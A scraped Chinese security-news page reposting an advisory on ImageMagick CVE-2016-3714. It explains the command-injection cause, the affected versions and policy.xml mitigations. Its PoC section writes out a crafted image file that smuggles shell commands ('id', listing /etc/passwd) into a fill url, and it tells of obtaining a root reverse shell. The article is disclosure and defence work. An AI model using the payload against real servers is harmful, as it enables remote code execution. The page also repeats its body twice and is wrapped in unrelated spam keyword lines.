精品国产一级在线观看,国产成人综合久久精品亚洲,免费一级欧美大片在线观看

當前位置:安全企業動態 → 正文

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修復方案

責任編輯:editor004 |來源:企業網D1Net  2016-05-06 11:24:50 本文摘自:Sobug安全平臺

1、前言

ImageMagick是一套功能強大、穩定而且開源的工具集和開發包,可以用來讀、寫和處理超過89種基本格式的圖片文件,包括流行的TIFF、JPEG、GIF、PNG、PDF以及PhotoCD等格式。眾多的網站平臺都是用他渲染處理圖片。可惜在3號時被公開了一些列漏洞,其中一個漏洞可導致遠程執行代碼(RCE),如果你處理用戶提交的圖片。該漏洞是針對在野外使用此漏洞。許多圖像處理插件依賴于ImageMagick庫,包括但不限于PHP的imagick,Ruby的rmagick和paperclip,以及NodeJS的ImageMagick等。

產生原因是因為字符過濾不嚴謹所導致的執行代碼.對于文件名傳遞給后端的命令過濾不足,導致允許多種文件格式轉換過程中遠程執行代碼。

2、影響版本范圍

ImageMagick 6.5.7-8 2012-08-17(手工測試風險存在)

ImageMagick 6.7.7-10 2014-03-06(手工測試風險存在)

低版本至6.9.3-9released 2016-04-30

3、攻擊POC演示

先構建一個精心準備的圖片:

vi exp1.jpg

pushgraphic-context

viewbox 0 0 640480

fill'url(https://"|id && ls -al /etc/passwd")'

popgraphic-context

執行攻擊POC1,雖然有報錯,但是兩條命令都成功繞出執行了,

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修復方案

  就說明漏洞是存在的

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修復方案

  那么在制作一個遠程下載反彈shell腳本,并且執行shell命令:

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修復方案

  執行成功,上接受服務器看去:

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修復方案

  Root權限的反彈shell就這樣上來了.

4、修復方案

目前官方的最新修復補丁版本還未能出來,所以暫時建議做以下兩種預防策略:

1. 在上傳圖片時需要通過文件內容來判斷用戶上傳的是否為真實圖片類型.

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修復方案

  2.使用策略配置文件來禁用ImageMagick的有風險的編碼器

對于ImageMagick全局策略配置文件在/etc/ImageMagick下對policy.xml最后一行進行增加下列配置:

vi/etc/ImageMagick/policy.xml

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修復方案

  在去執行攻擊POC2看看,無法執行下載動作和執行命令了。

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修復方案

關鍵字:ImageMagickNodeJS

本文摘自:Sobug安全平臺

x ImageMagick被爆高危漏洞(CVE-2016-3714) :附修復方案 掃一掃
分享本文到朋友圈
當前位置:安全企業動態 → 正文

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修復方案

責任編輯:editor004 |來源:企業網D1Net  2016-05-06 11:24:50 本文摘自:Sobug安全平臺

1、前言

ImageMagick是一套功能強大、穩定而且開源的工具集和開發包,可以用來讀、寫和處理超過89種基本格式的圖片文件,包括流行的TIFF、JPEG、GIF、PNG、PDF以及PhotoCD等格式。眾多的網站平臺都是用他渲染處理圖片。可惜在3號時被公開了一些列漏洞,其中一個漏洞可導致遠程執行代碼(RCE),如果你處理用戶提交的圖片。該漏洞是針對在野外使用此漏洞。許多圖像處理插件依賴于ImageMagick庫,包括但不限于PHP的imagick,Ruby的rmagick和paperclip,以及NodeJS的ImageMagick等。

產生原因是因為字符過濾不嚴謹所導致的執行代碼.對于文件名傳遞給后端的命令過濾不足,導致允許多種文件格式轉換過程中遠程執行代碼。

2、影響版本范圍

ImageMagick 6.5.7-8 2012-08-17(手工測試風險存在)

ImageMagick 6.7.7-10 2014-03-06(手工測試風險存在)

低版本至6.9.3-9released 2016-04-30

3、攻擊POC演示

先構建一個精心準備的圖片:

vi exp1.jpg

pushgraphic-context

viewbox 0 0 640480

fill'url(https://"|id && ls -al /etc/passwd")'

popgraphic-context

執行攻擊POC1,雖然有報錯,但是兩條命令都成功繞出執行了,

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修復方案

  就說明漏洞是存在的

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修復方案

  那么在制作一個遠程下載反彈shell腳本,并且執行shell命令:

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修復方案

  執行成功,上接受服務器看去:

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修復方案

  Root權限的反彈shell就這樣上來了.

4、修復方案

目前官方的最新修復補丁版本還未能出來,所以暫時建議做以下兩種預防策略:

1. 在上傳圖片時需要通過文件內容來判斷用戶上傳的是否為真實圖片類型.

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修復方案

  2.使用策略配置文件來禁用ImageMagick的有風險的編碼器

對于ImageMagick全局策略配置文件在/etc/ImageMagick下對policy.xml最后一行進行增加下列配置:

vi/etc/ImageMagick/policy.xml

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修復方案

  在去執行攻擊POC2看看,無法執行下載動作和執行命令了。

ImageMagick被爆高危漏洞(CVE-2016-3714) :附修復方案

關鍵字:ImageMagickNodeJS

本文摘自:Sobug安全平臺

電子周刊
回到頂部

關于我們聯系我們版權聲明隱私條款廣告服務友情鏈接投稿中心招賢納士

企業網版權所有 ©2010-2024 京ICP備09108050號-6 京公網安備 11010502049343號

^
  • <menuitem id="jw4sk"></menuitem>

    1. <form id="jw4sk"><tbody id="jw4sk"><dfn id="jw4sk"></dfn></tbody></form>
      主站蜘蛛池模板: 武穴市| 泰顺县| 会宁县| 济宁市| 潢川县| 梁河县| 铜山县| 莱西市| 博兴县| 宣汉县| 皋兰县| 芒康县| 会宁县| 封开县| 孝昌县| 霞浦县| 阿图什市| 奉节县| 金华市| 星座| 金华市| 义马市| 大兴区| 长岛县| 太保市| 资溪县| 札达县| 建瓯市| 水城县| 宽甸| 台安县| 穆棱市| 乌兰浩特市| 安泽县| 礼泉县| 鹤峰县| 绥滨县| 古蔺县| 余江县| 镇平县| 河源市|